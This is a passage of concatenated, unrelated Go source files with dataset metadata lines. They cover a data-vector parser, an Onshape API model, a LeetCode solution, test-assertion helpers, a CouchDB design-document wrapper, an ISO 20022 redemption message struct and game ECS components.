}
func (dv *NullableDecimalVector) Value(index uint) interface{} {
return dv.Get(index)
}
func NewNullableDecimalVector(data []byte, meta *shared.SerializedField, traits DecimalTraits) *NullableDecimalVector {
return &NullableDecimalVector{
nullableFixedWidthVec: newNullableFixedWidth(data, meta, traits.ByteWidth()),
scale: int(meta.MajorType.GetScale()),
prec: meta.MajorType.GetPrecision(),
traits: traits,
}
}
func NewValueVec(rawData []byte, meta *shared.SerializedField) DataVector {
ret := NewNumericValueVec(rawData, meta)
if ret != nil {
return ret
}
if meta.GetMajorType().GetMode() == common.DataMode_OPTIONAL {
switch meta.GetMajorType().GetMinorType() {
case common.MinorType_BIT:
return NewNullableBitVector(rawData, meta)
case common.MinorType_VARCHAR:
return NewNullableVarcharVector(rawData, meta)
case common.MinorType_TIMESTAMP:
return NewNullableTimestampVector(rawData, meta)
case common.MinorType_DATE:
return NewNullableDateVector(rawData, meta)
case common.MinorType_TIME:
return NewNullableTimeVector(rawData, meta)
case common.MinorType_INTERVAL:
return NewNullableIntervalVector(rawData, meta)
case common.MinorType_INTERVALDAY:
return NewNullableIntervalDayVector(rawData, meta)
case common.MinorType_INTERVALYEAR:
return NewNullableIntervalYearVector(rawData, meta)
case common.MinorType_DECIMAL28SPARSE:
return NewNullableDecimalVector(rawData, meta, &Decimal28SparseTraits)
case common.MinorType_DECIMAL38SPARSE:
return NewNullableDecimalVector(rawData, meta, &Decimal38SparseTraits)
}
} else {
switch meta.GetMajorType().GetMinorType() {
case common.MinorType_VARBINARY:
return NewVarbinaryVector(rawData, meta)
case common.MinorType_VARCHAR:
return NewVarcharVector(rawData, meta)
case common.MinorType_BIT:
return NewBitVector(rawData, meta)
case common.MinorType_TIMESTAMP:
return NewTimestampVector(rawData, meta)
case common.MinorType_DATE:
return NewDateVector(rawData, meta)
case common.MinorType_TIME:
return NewTimeVector(rawData, meta)
case common.MinorType_INTERVAL:
return NewIntervalVector(rawData, meta)
case common.MinorType_INTERVALDAY:
return NewIntervalDayVector(rawData, meta)
case common.MinorType_INTERVALYEAR:
return NewIntervalYearVector(rawData, meta)
case common.MinorType_DECIMAL28SPARSE:
return NewDecimalVector(rawData, meta, &Decimal28SparseTraits)
case common.MinorType_DECIMAL38SPARSE:
return NewDecimalVector(rawData, meta, &Decimal38SparseTraits)
}
}
return nil
} | internal/data/data_vector.go | 0.572723 | 0.581184 | data_vector.go | starcoder |
package onshape
import (
"encoding/json"
)
// BTExportTessellatedEdgesBody890AllOf struct for BTExportTessellatedEdgesBody890AllOf
type BTExportTessellatedEdgesBody890AllOf struct {
BtType *string `json:"btType,omitempty"`
Edges *[]BTExportTessellatedEdgesEdge1364 `json:"edges,omitempty"`
}
// NewBTExportTessellatedEdgesBody890AllOf instantiates a new BTExportTessellatedEdgesBody890AllOf object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewBTExportTessellatedEdgesBody890AllOf() *BTExportTessellatedEdgesBody890AllOf {
this := BTExportTessellatedEdgesBody890AllOf{}
return &this
}
// NewBTExportTessellatedEdgesBody890AllOfWithDefaults instantiates a new BTExportTessellatedEdgesBody890AllOf object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewBTExportTessellatedEdgesBody890AllOfWithDefaults() *BTExportTessellatedEdgesBody890AllOf {
this := BTExportTessellatedEdgesBody890AllOf{}
return &this
}
// GetBtType returns the BtType field value if set, zero value otherwise.
func (o *BTExportTessellatedEdgesBody890AllOf) GetBtType() string {
if o == nil || o.BtType == nil {
var ret string
return ret
}
return *o.BtType
}
// GetBtTypeOk returns a tuple with the BtType field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) GetBtTypeOk() (*string, bool) {
if o == nil || o.BtType == nil {
return nil, false
}
return o.BtType, true
}
// HasBtType returns a boolean if a field has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) HasBtType() bool {
if o != nil && o.BtType != nil {
return true
}
return false
}
// SetBtType gets a reference to the given string and assigns it to the BtType field.
func (o *BTExportTessellatedEdgesBody890AllOf) SetBtType(v string) {
o.BtType = &v
}
// GetEdges returns the Edges field value if set, zero value otherwise.
func (o *BTExportTessellatedEdgesBody890AllOf) GetEdges() []BTExportTessellatedEdgesEdge1364 {
if o == nil || o.Edges == nil {
var ret []BTExportTessellatedEdgesEdge1364
return ret
}
return *o.Edges
}
// GetEdgesOk returns a tuple with the Edges field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) GetEdgesOk() (*[]BTExportTessellatedEdgesEdge1364, bool) {
if o == nil || o.Edges == nil {
return nil, false
}
return o.Edges, true
}
// HasEdges returns a boolean if a field has been set.
func (o *BTExportTessellatedEdgesBody890AllOf) HasEdges() bool {
if o != nil && o.Edges != nil {
return true
}
return false
}
// SetEdges gets a reference to the given []BTExportTessellatedEdgesEdge1364 and assigns it to the Edges field.
func (o *BTExportTessellatedEdgesBody890AllOf) SetEdges(v []BTExportTessellatedEdgesEdge1364) {
o.Edges = &v
}
func (o BTExportTessellatedEdgesBody890AllOf) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if o.BtType != nil {
toSerialize["btType"] = o.BtType
}
if o.Edges != nil {
toSerialize["edges"] = o.Edges
}
return json.Marshal(toSerialize)
}
type NullableBTExportTessellatedEdgesBody890AllOf struct {
value *BTExportTessellatedEdgesBody890AllOf
isSet bool
}
func (v NullableBTExportTessellatedEdgesBody890AllOf) Get() *BTExportTessellatedEdgesBody890AllOf {
return v.value
}
func (v *NullableBTExportTessellatedEdgesBody890AllOf) Set(val *BTExportTessellatedEdgesBody890AllOf) {
v.value = val
v.isSet = true
}
func (v NullableBTExportTessellatedEdgesBody890AllOf) IsSet() bool {
return v.isSet
}
func (v *NullableBTExportTessellatedEdgesBody890AllOf) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableBTExportTessellatedEdgesBody890AllOf(val *BTExportTessellatedEdgesBody890AllOf) *NullableBTExportTessellatedEdgesBody890AllOf {
return &NullableBTExportTessellatedEdgesBody890AllOf{value: val, isSet: true}
}
func (v NullableBTExportTessellatedEdgesBody890AllOf) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableBTExportTessellatedEdgesBody890AllOf) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | onshape/model_bt_export_tessellated_edges_body_890_all_of.go | 0.652131 | 0.533884 | model_bt_export_tessellated_edges_body_890_all_of.go | starcoder |
package main
import (
"log"
)
/**
题目:https://leetcode-cn.com/problems/longest-consecutive-sequence/
最长连续序列
给定一个未排序的整数数组 nums ,找出数字连续的最长序列(不要求序列元素在原数组中连续)的长度。
请你设计并实现时间复杂度为O(n) 的算法解决此问题。
示例 1:
输入:nums = [100,4,200,1,3,2]
输出:4
解释:最长数字连续序列是 [1, 2, 3, 4]。它的长度为 4。
示例 2:
输入:nums = [0,3,7,2,5,8,4,6,0,1]
输出:9
提示:
0 <= nums.length <= 105
-109 <= nums[i] <= 109
*/
func main() {
nums := []int{100, 4, 200, 1, 3, 2}
log.Println("最长连续序列-哈希:", longestConsecutive(nums))
log.Println("最长连续序列-并查集:", longestConsecutive2(nums))
}
func longestConsecutive(nums []int) int {
numSet := map[int]bool{}
for _, num := range nums {
numSet[num] = true
}
res := 0
for num := range numSet {
// 先判断num-1有没有,没有则从当前数字开始增加,一直判断
// +1,-1 都行,取决于是从大到小寻扎还是从小到大寻找
if !numSet[num-1] {
currentNum := num
cnt := 1
for numSet[currentNum+1] {
currentNum++
cnt++
}
// 交换结果
if res < cnt {
res = cnt
}
}
}
return res
}
// longestConsecutive2 并查集
func longestConsecutive2(nums []int) int {
uf := NewUF(nums)
res := 0
for i := 0; i < len(nums); i++ { //遍历数组
n, tmp := nums[i], nums[i] //tmp记录原始值
for {
if _, ok := uf.Find(n - 1); !ok { //如果不存在比当前值-1的值,则肯定不连通
break
}
if !uf.Connected(n-1, n) { //如果存在n-1并且还没有连通,则连一下
uf.Union(n-1, n)
n = n - 1
} else { //如果n-1与n是连通的,则求一下父节点值
n, _ = uf.Find(n)
break
}
}
res = max(res, tmp-n+1) //记录一下,连同节点的最大距离即为最长序列
}
return res
}
func max(a, b int) int {
if a > b {
return a
}
return b
}
type UF struct {
parent map[int]int //每个节点的父节点
}
func NewUF(nums []int) *UF {
uf := UF{}
uf.parent = make(map[int]int)
for _, num := range nums {
uf.parent[num] = num
}
return &uf
}
func (uf *UF) Connected(a, b int) bool {
pA, _ := uf.Find(a)
pB, _ := uf.Find(b)
return pA == pB
}
func (uf *UF) Union(a, b int) {
pA, _ := uf.Find(a)
pB, _ := uf.Find(b)
if pA == pB {
return
}
if pA > pB { //将值小的节点作为父节点
uf.parent[pA] = pB
} else {
uf.parent[pB] = pA
}
}
func (uf *UF) Find(a int) (int, bool) {
if _, ok := uf.parent[a]; !ok {
return -1, false
}
for a != uf.parent[a] {
uf.parent[a] = uf.parent[uf.parent[a]] //压缩树的高度
a = uf.parent[a]
}
return a, true
} | datastruct/hash/leetcodeQuestion/longestConsecutive/longestConsecutive.go | 0.520984 | 0.516413 | longestConsecutive.go | starcoder |
package testing
import (
"testing"
)
const (
notEqual = "assertion failed\ngot :\t>[\t%v\t]<\nwant :\t>[\t%v\t]<"
)
func assert(t *testing.T, method func() bool,
context string, args ...interface{}) {
t.Helper()
if !method() {
if len(args) > 0 {
t.Errorf(context, args...)
} else {
t.Errorf(context)
}
}
}
func assertSimpleEqualContext(t *testing.T, have, want interface{},
context string, args ...interface{}) {
t.Helper()
assert(t, func() bool { return have == want }, context, args...)
}
func assertSimpleNotEqualContext(t *testing.T, have, want interface{},
context string, args ...interface{}) {
t.Helper()
assert(t, func() bool { return have != want }, context, args...)
}
func assertSimpleEqual(t *testing.T, have, want interface{}) {
t.Helper()
assertSimpleEqualContext(t, have, want, notEqual, have, want)
}
func assertSimpleNotEqual(t *testing.T, have, want interface{}) {
t.Helper()
assertSimpleNotEqualContext(t, have, want, notEqual, have, want)
}
// AssertEqual run an assertion that the argument are equal
func AssertEqual(t *testing.T, have, want interface{}) {
t.Helper()
assertSimpleEqual(t, have, want)
}
// AssertEqualContext run a assertion that the arguments are equal
// on fail the error message context is yield
func AssertEqualContext(t *testing.T, have, want interface{},
context string, args ...interface{}) {
t.Helper()
assertSimpleEqualContext(t, have, want, context, args...)
}
// AssertNotEqual run an assertion that the argument are not equal
func AssertNotEqual(t *testing.T, have, want interface{}) {
t.Helper()
assertSimpleNotEqual(t, have, want)
}
// func AssertNotEqualContext(have, want interface{}, context string, args ...interface{}) {
// assertSimpleNotEqualContext(have, want, context, args)
// }
// AssertNotNil run an assertion that the argument is not nil
func AssertNotNil(t *testing.T, have interface{}) {
t.Helper()
assertSimpleNotEqual(t, have, nil)
}
// AssertNil run an assertion that the argument is nil
func AssertNil(t *testing.T, have interface{}) {
t.Helper()
assertSimpleEqual(t, have, nil)
}
// AssertTrue run an assertion that the bool argument is true
func AssertTrue(t *testing.T, have bool) {
t.Helper()
assertSimpleEqual(t, have, true)
}
// func AssertTrueContext(have bool, context string, args ...interface{}) {
// assertSimpleEqualContext(have, true, context, args...)
// }
// AssertFalse run an assertion that the bool argument is false
func AssertFalse(t *testing.T, have bool) {
t.Helper()
assertSimpleEqual(t, have, false)
}
// func AssertFalseContext(have bool, context string, args ...interface{}) {
// assertSimpleEqualContext(have, false, context, args...)
// }
// AssertStringEqual run an assertion that the two string arguments are equal
func AssertStringEqual(t *testing.T, have, want string) {
t.Helper()
assertSimpleEqual(t, have, want)
}
// func AssertStringEqualContext(have, want string, context string, args ...interface{}) {
// assertSimpleEqualContext(have, want, context, args...)
// }
// AssertStringNotEqual run an assertion that the two string arguments are not equal
func AssertStringNotEqual(t *testing.T, have, want string) {
t.Helper()
assertSimpleNotEqual(t, have, want)
}
// func AssertStringNotEqualContext(have, want string, context string, args ...interface{}) {
// assertSimpleNotEqualContext(have, want, context, args...)
// }
// AssertIntEqual run an assertion that the two int arguments are equal
func AssertIntEqual(t *testing.T, have, want int) {
t.Helper()
assertSimpleEqual(t, have, want)
}
// func AssertIntNotEqual(have, want int) {
// assertSimpleNotEqual(have, want)
// }
// func AssertMapEqual(have, want map[string]string) {
// Assert(func() bool { return reflect.DeepEqual(have, want) }, notEqual, have, want)
// } | testing/assert.go | 0.531939 | 0.765922 | assert.go | starcoder |
package couchdb
//--------------------
// DESIGN
//--------------------
// Design provides convenient access to a design document.
type Design interface {
// ID returns the ID of the design.
ID() string
// Language returns the language for views and shows.
Language() string
// Language sets the language for views and shows.
SetLanguage(language string)
// View returns the map and the reduce functions of the
// view with the ID, otherwise false.
View(id string) (string, string, bool)
// SetView sets the map and the reduce functions of the
// view with the ID.
SetView(id, mapf, reducef string)
// Show returns the show function with the ID, otherwise false.
Show(id string) (string, bool)
// SetShow sets the show function with the ID.
SetShow(id, showf string)
// Write creates a new design document or updates an
// existing one.
Write(rps ...Parameter) ResultSet
// Delete a design document.
Delete(rps ...Parameter) ResultSet
}
// design implements the Design interface.
type design struct {
cdb *couchdb
id string
document *designDocument
}
// newDesign creates a design instance.
func newDesign(cdb *couchdb, id string) (*design, error) {
designID := "_design/" + id
ok, err := cdb.HasDocument(designID)
if err != nil {
return nil, err
}
document := designDocument{}
if ok {
// Read the design document.
resp := cdb.ReadDocument(designID)
if !resp.IsOK() {
return nil, resp.Error()
}
err = resp.Document(&document)
if err != nil {
return nil, err
}
} else {
// Create the design document.
document = designDocument{
ID: designID,
Language: "javascript",
}
}
d := &design{
cdb: cdb,
id: id,
document: &document,
}
return d, nil
}
// ID implements the Design interface.
func (d *design) ID() string {
return d.id
}
// Language implements the Design interface.
func (d *design) Language() string {
return d.document.Language
}
// SetLanguage implements the Design interface.
func (d *design) SetLanguage(language string) {
d.document.Language = language
}
// View implements the Design interface.
func (d *design) View(id string) (string, string, bool) {
if d.document.Views == nil {
d.document.Views = designViews{}
}
view, ok := d.document.Views[id]
if !ok {
return "", "", false
}
return view.Map, view.Reduce, true
}
// SetView implements the Design interface.
func (d *design) SetView(id, mapf, reducef string) {
if d.document.Views == nil {
d.document.Views = designViews{}
}
d.document.Views[id] = designView{
Map: mapf,
Reduce: reducef,
}
}
// Show implements the Design interface.
func (d *design) Show(id string) (string, bool) {
if d.document.Shows == nil {
d.document.Shows = map[string]string{}
}
show, ok := d.document.Shows[id]
if !ok {
return "", false
}
return show, true
}
// SetShow implements the Design interface.
func (d *design) SetShow(id, showf string) {
if d.document.Shows == nil {
d.document.Shows = map[string]string{}
}
d.document.Shows[id] = showf
}
// Write implements the Design interface.
func (d *design) Write(rps ...Parameter) ResultSet {
if d.document.Revision == "" {
return d.cdb.CreateDocument(d.document, rps...)
}
return d.cdb.UpdateDocument(d.document, rps...)
}
// Delete implements the Design interface.
func (d *design) Delete(rps ...Parameter) ResultSet {
return d.cdb.DeleteDocument(d.document, rps...)
}
//--------------------
// DESIGN DOCUMENT
//--------------------
// designView defines a view inside a design document.
type designView struct {
Map string `json:"map,omitempty"`
Reduce string `json:"reduce,omitempty"`
}
type designViews map[string]designView
// designAttachment defines an attachment inside a design document.
type designAttachment struct {
Stub bool `json:"stub,omitempty"`
ContentType string `json:"content_type,omitempty"`
Length int `json:"length,omitempty"`
}
type designAttachments map[string]designAttachment
// designDocument contains the data of view design documents.
type designDocument struct {
ID string `json:"_id"`
Revision string `json:"_rev,omitempty"`
Language string `json:"language,omitempty"`
ValidateDocumentUpdate string `json:"validate_doc_update,omitempty"`
Views designViews `json:"views,omitempty"`
Shows map[string]string `json:"shows,omitempty"`
Attachments designAttachments `json:"_attachments,omitempty"`
Signatures map[string]string `json:"signatures,omitempty"`
Libraries interface{} `json:"libs,omitempty"`
}
// EOF | couchdb/design.go | 0.725357 | 0.448004 | design.go | starcoder |
package iso20022
// Execution of a redemption order.
type RedemptionExecution5 struct {
// Unique and unambiguous identifier for an order, as assigned by the instructing party.
OrderReference *Max35Text `xml:"OrdrRef"`
// Unique and unambiguous investor's identification of an order. This reference can typically be used in a hub scenario to give the reference of the order as assigned by the underlying client.
ClientReference *Max35Text `xml:"ClntRef,omitempty"`
// Unique and unambiguous identifier for an order execution, as assigned by a confirming party.
DealReference *Max35Text `xml:"DealRef"`
// Specifies the category of the investment fund order.
OrderType []*FundOrderType3 `xml:"OrdrTp,omitempty"`
// Additional information about the investor.
BeneficiaryDetails *IndividualPerson12 `xml:"BnfcryDtls,omitempty"`
// Number of investment funds units redeemed.
UnitsNumber *FinancialInstrumentQuantity1 `xml:"UnitsNb"`
// Indicates the rounding direction applied to nearest unit.
Rounding *RoundingDirection2Code `xml:"Rndg,omitempty"`
// Amount of money paid to the investor as a result of the redemption after deduction of charges, commissions and taxes.
// [(Quantity * Price) - (Charges + Commissions +Taxes)]
NetAmount *ActiveCurrencyAndAmount `xml:"NetAmt,omitempty"`
// Account between an investor(s) and a fund manager or a fund. The account can contain holdings in any investment fund or investment fund class managed (or distributed) by the fund manager, within the same fund family.
InvestmentAccountDetails *InvestmentAccount21 `xml:"InvstmtAcctDtls"`
// Portion of the investor's holdings, in a specific investment fund/ fund class, that is redeemed.
HoldingsRedemptionRate *PercentageRate `xml:"HldgsRedRate,omitempty"`
// Amount of money resulting from the redemption before deduction of charges, commissions and taxes.
// [Quantity * Price]
GrossAmount *ActiveCurrencyAndAmount `xml:"GrssAmt,omitempty"`
// Date and time at which a price is applied, according to the terms stated in the prospectus.
TradeDateTime *DateAndDateTimeChoice `xml:"TradDtTm"`
// Total amount of money paid /to be paid or received in exchange for the financial instrument in the individual order.
SettlementAmount *ActiveCurrencyAndAmount `xml:"SttlmAmt"`
// Date on which cash is available.
CashSettlementDate *ISODate `xml:"CshSttlmDt,omitempty"`
// Method by which the transaction is settled.
SettlementMethod *DeliveryReceiptType2Code `xml:"SttlmMtd,omitempty"`
// Price at which the order was executed.
DealingPriceDetails *UnitPrice10 `xml:"DealgPricDtls"`
// Other quoted price than the one at which the order was executed.
InformativePriceDetails []*UnitPrice10 `xml:"InftvPricDtls,omitempty"`
// Indicates whether the order has been partially executed, ie, the confirmed quantity does not match the ordered quantity for a given financial instrument.
PartiallyExecutedIndicator *YesNoIndicator `xml:"PrtlyExctdInd"`
// Specifies that the execution was subject to best execution rules as defined by MiFID.
BestExecution *BestExecution1Code `xml:"BestExctn,omitempty"`
// Indicates whether the dividend is included, ie, cum-dividend, in the executed price. When the dividend is not included, the price will be ex-dividend.
CumDividendIndicator *YesNoIndicator `xml:"CumDvddInd"`
// Part of the price deemed as accrued income or profit rather than capital. The interim profit amount is used for tax purposes.
InterimProfitAmount *ProfitAndLoss1Choice `xml:"IntrmPrftAmt,omitempty"`
// Information needed to process a currency exchange or conversion.
ForeignExchangeDetails []*ForeignExchangeTerms7 `xml:"FXDtls,omitempty"`
// Dividend option chosen by the account owner based on the options offered in the prospectus.
IncomePreference *IncomePreference1Code `xml:"IncmPref,omitempty"`
// Tax group to which the purchased investment fund units belong. The investor indicates to the intermediary operating pooled nominees, which type of unit is to be sold.
Group1Or2Units *UKTaxGroupUnitCode `xml:"Grp1Or2Units,omitempty"`
// Amount of money associated with a service.
ChargeGeneralDetails *TotalCharges3 `xml:"ChrgGnlDtls,omitempty"`
// Amount of money due to a party as compensation for a service.
CommissionGeneralDetails *TotalCommissions3 `xml:"ComssnGnlDtls,omitempty"`
// Breakdown of the net amount per type of order.
StaffClientBreakdown []*InvestmentFundsOrderBreakdown1 `xml:"StffClntBrkdwn,omitempty"`
// Tax related to an investment fund order.
TaxGeneralDetails *TotalTaxes3 `xml:"TaxGnlDtls,omitempty"`
// Parameters used to execute the settlement of an investment fund order.
SettlementAndCustodyDetails *FundSettlementParameters4 `xml:"SttlmAndCtdyDtls,omitempty"`
// Indicates whether the financial instrument is to be physically delivered.
PhysicalDeliveryIndicator *YesNoIndicator `xml:"PhysDlvryInd"`
// Parameters of a physical delivery.
PhysicalDeliveryDetails *DeliveryParameters3 `xml:"PhysDlvryDtls,omitempty"`
// Payment processes required to transfer cash from the debtor to the creditor.
CashSettlementDetails *PaymentTransaction22 `xml:"CshSttlmDtls,omitempty"`
// Additional specific settlement information for non-regulated traded funds.
NonStandardSettlementInformation *Max350Text `xml:"NonStdSttlmInf,omitempty"`
// Percentage of units partially settled.
PartialSettlementOfUnits *PercentageRate `xml:"PrtlSttlmOfUnits,omitempty"`
// Percentage of cash partially settled.
PartialSettlementOfCash *PercentageRate `xml:"PrtlSttlmOfCsh,omitempty"`
// Amount retained by the Fund and paid out later at a time decided by the Fund.
PartialRedemptionWithholdingAmount *CurrencyAndAmount `xml:"PrtlRedWhldgAmt,omitempty"`
// Specifies if advice has been received from an independent financial advisor.
FinancialAdvice *FinancialAdvice1Code `xml:"FinAdvc,omitempty"`
// Specifies whether the trade is negotiated.
NegotiatedTrade *NegotiatedTrade1Code `xml:"NgtdTrad,omitempty"`
// Specifies whether the order execution confirmation is late.
LateReport *LateReport1Code `xml:"LateRpt,omitempty"`
// Information about parties related to the transaction.
RelatedPartyDetails []*Intermediary9 `xml:"RltdPtyDtls,omitempty"`
// Part of an investor's subscription amount that is held by the fund in order to pay incentive / performance fees at the end of the fiscal year.
Equalisation *Equalisation1 `xml:"Equlstn,omitempty"`
}
func (r *RedemptionExecution5) SetOrderReference(value string) {
r.OrderReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) SetClientReference(value string) {
r.ClientReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) SetDealReference(value string) {
r.DealReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) AddOrderType() *FundOrderType3 {
newValue := new (FundOrderType3)
r.OrderType = append(r.OrderType, newValue)
return newValue
}
func (r *RedemptionExecution5) AddBeneficiaryDetails() *IndividualPerson12 {
r.BeneficiaryDetails = new(IndividualPerson12)
return r.BeneficiaryDetails
}
func (r *RedemptionExecution5) AddUnitsNumber() *FinancialInstrumentQuantity1 {
r.UnitsNumber = new(FinancialInstrumentQuantity1)
return r.UnitsNumber
}
func (r *RedemptionExecution5) SetRounding(value string) {
r.Rounding = (*RoundingDirection2Code)(&value)
}
func (r *RedemptionExecution5) SetNetAmount(value, currency string) {
r.NetAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) AddInvestmentAccountDetails() *InvestmentAccount21 {
r.InvestmentAccountDetails = new(InvestmentAccount21)
return r.InvestmentAccountDetails
}
func (r *RedemptionExecution5) SetHoldingsRedemptionRate(value string) {
r.HoldingsRedemptionRate = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetGrossAmount(value, currency string) {
r.GrossAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) AddTradeDateTime() *DateAndDateTimeChoice {
r.TradeDateTime = new(DateAndDateTimeChoice)
return r.TradeDateTime
}
func (r *RedemptionExecution5) SetSettlementAmount(value, currency string) {
r.SettlementAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) SetCashSettlementDate(value string) {
r.CashSettlementDate = (*ISODate)(&value)
}
func (r *RedemptionExecution5) SetSettlementMethod(value string) {
r.SettlementMethod = (*DeliveryReceiptType2Code)(&value)
}
func (r *RedemptionExecution5) AddDealingPriceDetails() *UnitPrice10 {
r.DealingPriceDetails = new(UnitPrice10)
return r.DealingPriceDetails
}
func (r *RedemptionExecution5) AddInformativePriceDetails() *UnitPrice10 {
newValue := new (UnitPrice10)
r.InformativePriceDetails = append(r.InformativePriceDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) SetPartiallyExecutedIndicator(value string) {
r.PartiallyExecutedIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) SetBestExecution(value string) {
r.BestExecution = (*BestExecution1Code)(&value)
}
func (r *RedemptionExecution5) SetCumDividendIndicator(value string) {
r.CumDividendIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) AddInterimProfitAmount() *ProfitAndLoss1Choice {
r.InterimProfitAmount = new(ProfitAndLoss1Choice)
return r.InterimProfitAmount
}
func (r *RedemptionExecution5) AddForeignExchangeDetails() *ForeignExchangeTerms7 {
newValue := new (ForeignExchangeTerms7)
r.ForeignExchangeDetails = append(r.ForeignExchangeDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) SetIncomePreference(value string) {
r.IncomePreference = (*IncomePreference1Code)(&value)
}
func (r *RedemptionExecution5) SetGroup1Or2Units(value string) {
r.Group1Or2Units = (*UKTaxGroupUnitCode)(&value)
}
func (r *RedemptionExecution5) AddChargeGeneralDetails() *TotalCharges3 {
r.ChargeGeneralDetails = new(TotalCharges3)
return r.ChargeGeneralDetails
}
func (r *RedemptionExecution5) AddCommissionGeneralDetails() *TotalCommissions3 {
r.CommissionGeneralDetails = new(TotalCommissions3)
return r.CommissionGeneralDetails
}
func (r *RedemptionExecution5) AddStaffClientBreakdown() *InvestmentFundsOrderBreakdown1 {
newValue := new (InvestmentFundsOrderBreakdown1)
r.StaffClientBreakdown = append(r.StaffClientBreakdown, newValue)
return newValue
}
func (r *RedemptionExecution5) AddTaxGeneralDetails() *TotalTaxes3 {
r.TaxGeneralDetails = new(TotalTaxes3)
return r.TaxGeneralDetails
}
func (r *RedemptionExecution5) AddSettlementAndCustodyDetails() *FundSettlementParameters4 {
r.SettlementAndCustodyDetails = new(FundSettlementParameters4)
return r.SettlementAndCustodyDetails
}
func (r *RedemptionExecution5) SetPhysicalDeliveryIndicator(value string) {
r.PhysicalDeliveryIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) AddPhysicalDeliveryDetails() *DeliveryParameters3 {
r.PhysicalDeliveryDetails = new(DeliveryParameters3)
return r.PhysicalDeliveryDetails
}
func (r *RedemptionExecution5) AddCashSettlementDetails() *PaymentTransaction22 {
r.CashSettlementDetails = new(PaymentTransaction22)
return r.CashSettlementDetails
}
func (r *RedemptionExecution5) SetNonStandardSettlementInformation(value string) {
r.NonStandardSettlementInformation = (*Max350Text)(&value)
}
func (r *RedemptionExecution5) SetPartialSettlementOfUnits(value string) {
r.PartialSettlementOfUnits = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetPartialSettlementOfCash(value string) {
r.PartialSettlementOfCash = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetPartialRedemptionWithholdingAmount(value, currency string) {
r.PartialRedemptionWithholdingAmount = NewCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) SetFinancialAdvice(value string) {
r.FinancialAdvice = (*FinancialAdvice1Code)(&value)
}
func (r *RedemptionExecution5) SetNegotiatedTrade(value string) {
r.NegotiatedTrade = (*NegotiatedTrade1Code)(&value)
}
func (r *RedemptionExecution5) SetLateReport(value string) {
r.LateReport = (*LateReport1Code)(&value)
}
func (r *RedemptionExecution5) AddRelatedPartyDetails() *Intermediary9 {
newValue := new (Intermediary9)
r.RelatedPartyDetails = append(r.RelatedPartyDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) AddEqualisation() *Equalisation1 {
r.Equalisation = new(Equalisation1)
return r.Equalisation
} | RedemptionExecution5.go | 0.820757 | 0.481332 | RedemptionExecution5.go | starcoder |
package component
import (
"github.com/juan-medina/goecs"
"reflect"
)
// Bullet is a component for our bullets
type Bullet struct{}
// Block is a component for a map blocks
type Block struct {
C, R int
ClearOn float32
Text *goecs.Entity
}
// FloatText is a component for a floating text
type FloatText struct{}
// Plane is a component for the plane
type Plane struct{}
// Mesh is a component for the mesh
type Mesh struct{}
// Production is a component for the production area
type Production struct{}
type types struct {
// Bullet is the reflect.Type for component.Bullet
Bullet reflect.Type
// Block is the reflect.Type for component.Block
Block reflect.Type
// FloatText is the reflect.Type for component.FloatText
FloatText reflect.Type
// Plane is the reflect.Type for component.Plane
Plane reflect.Type
// Mesh is the reflect.Type for component.Mesh
Mesh reflect.Type
// Production is the reflect.Type for component.Production
Production reflect.Type
}
// TYPE hold the reflect.Type for our components
var TYPE = types{
Bullet: reflect.TypeOf(Bullet{}),
Block: reflect.TypeOf(Block{}),
FloatText: reflect.TypeOf(FloatText{}),
Plane: reflect.TypeOf(Plane{}),
Mesh: reflect.TypeOf(Mesh{}),
Production: reflect.TypeOf(Production{}),
}
type gets struct {
// Bullet gets a component.Bullet from a goecs.Entity
Bullet func(e *goecs.Entity) Bullet
// Block gets a component.Block from a goecs.Entity
Block func(e *goecs.Entity) Block
// FloatText gets a component.FloatText from a goecs.Entity
FloatText func(e *goecs.Entity) FloatText
// Plane gets a component.Plane from a goecs.Entity
Plane func(e *goecs.Entity) Plane
// Mesh gets a component.Mesh from a goecs.Entity
Mesh func(e *goecs.Entity) Mesh
// Production gets a component.Production from a goecs.Entity
Production func(e *goecs.Entity) Production
}
// Get a geometry component
//goland:noinspection GoUnusedGlobalVariable
var Get = gets{
// Bullet gets a component.Bullet from a goecs.Entity
Bullet: func(e *goecs.Entity) Bullet {
return e.Get(TYPE.Bullet).(Bullet)
},
// Bullet gets a component.Bullet from a goecs.Entity
Block: func(e *goecs.Entity) Block {
return e.Get(TYPE.Block).(Block)
},
// FloatText gets a component.FloatText from a goecs.Entity
FloatText: func(e *goecs.Entity) FloatText {
return e.Get(TYPE.FloatText).(FloatText)
},
// Plane gets a component.Plane from a goecs.Entity
Plane: func(e *goecs.Entity) Plane {
return e.Get(TYPE.Plane).(Plane)
},
// Mesh gets a component.Mesh from a goecs.Entity
Mesh: func(e *goecs.Entity) Mesh {
return e.Get(TYPE.Mesh).(Mesh)
},
// Production gets a component.Production from a goecs.Entity
Production: func(e *goecs.Entity) Production {
return e.Get(TYPE.Production).(Production)
},
